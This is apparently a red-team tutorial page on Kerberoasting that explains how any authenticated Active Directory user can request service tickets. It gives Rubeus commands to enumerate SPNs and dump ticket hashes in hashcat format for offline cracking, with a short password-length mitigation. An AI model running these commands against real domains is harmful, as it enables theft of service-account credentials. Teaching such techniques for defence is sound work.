How can we help you learn?

Popular:

Red Teaming/Active Directory

Kerberoasting 101

Extracting Service Account Credentials via SPN tickets.

Overview

Kerberoasting is a post-exploitation technique that allows an attacker to request a Kerberos service ticket (TGS) for any service principal name (SPN) in the domain. The vulnerability lies in the fact that any authenticated user can request these tickets.

Attack Execution

1. Enumerate SPNs:

powershell

Rubeus.exe kerberoast /stats

2. Request & Roast:

powershell

Rubeus.exe kerberoast /format:hashcat /outfile:hashes.txt

Mitigation

Ensure service accounts have complex, long passwords (25+ characters) to make offline cracking infeasible.

Continue Learning

AS-REP Roasting

Learn the next step in Active Directory attacks: targeting users without Kerberos pre-authentication enabled.

Golden Ticket Attack

Master the ultimate persistence technique by forging Kerberos Ticket Granting Tickets (TGTs).